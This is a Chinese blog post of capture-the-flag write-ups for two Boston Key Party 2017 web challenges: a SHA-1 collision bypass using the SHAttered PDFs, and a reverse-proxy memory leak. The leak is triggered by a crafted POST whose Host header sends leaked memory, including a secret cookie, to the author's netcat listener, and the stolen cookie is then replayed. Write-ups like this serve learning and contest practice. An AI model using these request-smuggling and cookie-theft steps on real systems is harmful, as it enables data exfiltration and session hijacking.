CTF

两道BKP CTF的解答

本文总阅读量
Posted by Xiaoxi on March 2, 2017

这周,跟着实验室各位大佬们参加了BKP的比赛。国际CTF比赛好像更加综合一些,对选手即要求二进制基础也要求Web基础。下面是两道Web题的解答。

Prudentialv2

这题是修复了2015年出的Prudential的漏洞。

http://blog.rentjong.net/2015/03/boston-key-party-2015-prudential.html

源码可以在index.txt中看到http://54.202.82.13/index.txt

<html>
<head>
	<title>level1</title>
    <link rel='stylesheet' href='style.css' type='text/css'>
</head>
<body>

<?php
require 'flag.php';

if (isset($_GET['name']) and isset($_GET['password'])) {
    $name = (string)$_GET['name'];
    $password = (string)$_GET['password'];

    if ($name == $password) {
        print 'Your password can not be your name.';
    } else if (sha1($name) === sha1($password)) {
      die('Flag: '.$flag);
    } else {
        print '<p class="alert">Invalid password.</p>';
    }
}
?>

<section class="login">
	<div class="title">
		<a href="./index.txt">Level 1</a>
	</div>

	<form method="get">
		<input type="text" required name="name" placeholder="Name"/><br/>
		<input type="text" required name="password" placeholder="Password" /><br/>
		<input type="submit"/>
	</form>
</section>
</body>
</html>

因为string了,而且还是强等于。所以以前的方法基本不行。我们需要找到一对碰撞sha1,才能成功。

结合前天google发的sha-1碰撞论文,https://shattered.io/static/shattered.pdf用里面给的两个示例pdf文件进行构造就好。

构造的时候会发现pdf太大了,无法在url中完全带上。然后,看论文中有这么一句:This is an identical-prefix collision attack, where a given prefix P is extended with two distinct near-collision block pairs such that they collide for any suffix S。图片的说明如下:** https://shattered.it/static/pdf_format.png**说明,碰撞部分是pdf中的某一部分,而不是全部。那么我们就可以尝试取pdf的某一部分,进行sha-1,让其碰撞。

找到碰撞部分,以urlencode编码发送请求,就能得到flag

Accelerated.zone

题目给了一个反向代理,其功能大致有:

  1. 8000端口会反向代理7733的数据
  2. 反代不管访问啥都会返回500
  3. 在逆反向代理,核心用的是这个库https://github.com/rboulton/libmicrohttpd ,大概逻辑是用这个库起了一个server,读取来自用户的输入,然后起一个curl读取远程的内容,再返回
  4. 发送给反代的http头部中的host指向的部分,实际控制代理服务器的转发。即host指向哪,服务器就会向那进行转发

后来,问了队友,队友说这题存在内存泄漏,把泄漏数据打到VPS上读取就好了。(可能这就是这个反向代理软件运行久了,就超级烧内存和CPU的原因)

所以,向Accerletated发送一个包,host为自己的VPS,然后查看数据。

这个包需要是POST的数据包,然后content-length需要很大。

POST / HTTP/1.1
Host: xx.xx.13.97:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 999999999

123

在VPS上可以看到数据

[root@cloud ~]# nc -l -vv 7733|hexdump -Cv
Connection from 54.218.82.219 port 7733 [tcp/*] accepted
00000000  50 4f 53 54 20 2f 20 48  54 54 50 2f 31 2e 31 0d  |POST / HTTP/1.1.|
00000010  0a 48 6f 73 74 3a 20 31  31 38 2e 39 39 2e 31 33  |.Host: xx.x.xx|
00000020  2e 39 37 3a 37 37 33 33  0d 0a 41 63 63 65 70 74  |.xx:xx..Accept|
00000030  3a 20 2a 2f 2a 0d 0a 43  6f 6e 74 65 6e 74 2d 4c  |: */*..Content-L|
00000040  65 6e 67 74 68 3a 20 33  38 35 32 37 0d 0a 43 6f  |ength: 38527..Co|
00000050  6e 74 65 6e 74 2d 54 79  70 65 3a 20 61 70 70 6c  |ntent-Type: appl|
00000060  69 63 61 74 69 6f 6e 2f  78 2d 77 77 77 2d 66 6f  |ication/x-www-fo|
00000070  72 6d 2d 75 72 6c 65 6e  63 6f 64 65 64 0d 0a 45  |rm-urlencoded..E|
00000080  78 70 65 63 74 3a 20 31  30 30 2d 63 6f 6e 74 69  |xpect: 100-conti|
00000090  6e 75 65 0d 0a 0d 0a 31  32 33 00 00 00 00 00 00  |nue....123......|
000000a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
...
0088f0  00 11 7e 00 00 00 00 00  00 b8 07 00 c0 b9 7f 00  |..~.............|
00008900  00 b8 07 00 c0 b9 7f 00  00 e0 92 00 c0 b9 7f 00  |................|
00008910  00 e0 92 00 c0 b9 7f 00  00 74 20 69 70 36 2d 6c  |.........t ip6-l|
00008920  6f 63 61 6c 68 6f 73 74  20 69 70 36 2d 6c 6f 6f  |ocalhost ip6-loo|
00008930  70 62 61 63 6b 0a 66 65  30 30 3a 3a 30 09 69 70  |pback.fe00::0.ip|
00008940  36 2d 6c 6f 63 61 6c 6e  65 74 0a 66 66 30 30 3a  |6-localnet.ff00:|
00008950  3a 30 09 69 70 36 2d 6d  63 61 73 74 70 72 65 66  |:0.ip6-mcastpref|
00008960  69 78 0a 66 66 30 32 3a  3a 31 09 69 70 36 2d 61  |ix.ff02::1.ip6-a|
00008970  6c 6c 6e 6f 64 65 73 0a  66 66 30 32 3a 3a 32 09  |llnodes.ff02::2.|
00008980  69 70 36 2d 61 6c 6c 72  6f 75 74 65 72 73 0a 31  |ip6-allrouters.1|
00008990  37 32 2e 31 37 2e 30 2e  32 09 34 32 39 63 35 37  |72.17.0.2.429c57|
000089a0  64 38 38 31 32 34 0a 72  63 68 20 75 73 2d 77 65  |d88124.rch us-we|
000089b0  73 74 2d 32 2e 63 6f 6d  70 75 74 65 2e 69 6e 74  |st-2.compute.int|
000089c0  65 72 6e 61 6c 0a 00 00  00 00 00 00 00 00 00 00  |ernal...........|

多打几次会打到一个cookie

00007d50  00 00 00 40 87 00 dc 53  7f 00 00 47 87 00 dc 53  |...@...S...G...S|
00007d60  7f 00 00 02 00 00 00 00  00 00 00 73 65 63 72 65  |...........secre|
00007d70  74 00 73 50 62 6b 54 68  62 32 69 4b 59 4f 38 74  |t.sPbkThb2iKYO8t|
00007d80  5a 53 50 49 31 70 71 77  00 00 00 20 87 00 dc 53  |ZSPI1pqw... ...S|
00007d90  7f 00 00 7a 0a 00 dc 53  7f 00 00 8a 0a 00 dc 53  |...z...S.......S|

Cookie: secret=sPbkThb2iKYO8tZSPI1pqw

然后,带着cookie访问,就能得到flag

GET / HTTP/1.1
Host: accelerated.zone:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: secret=sPbkThb2iKYO8tZSPI1pqw
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 63
Content-Type: text/html; charset=UTF-8
Date: Sun, 26 Feb 2017 03:47:37 GMT

FLAG{ISwearIWroteThisChallengeWeeksAgo}Get better cookies bro.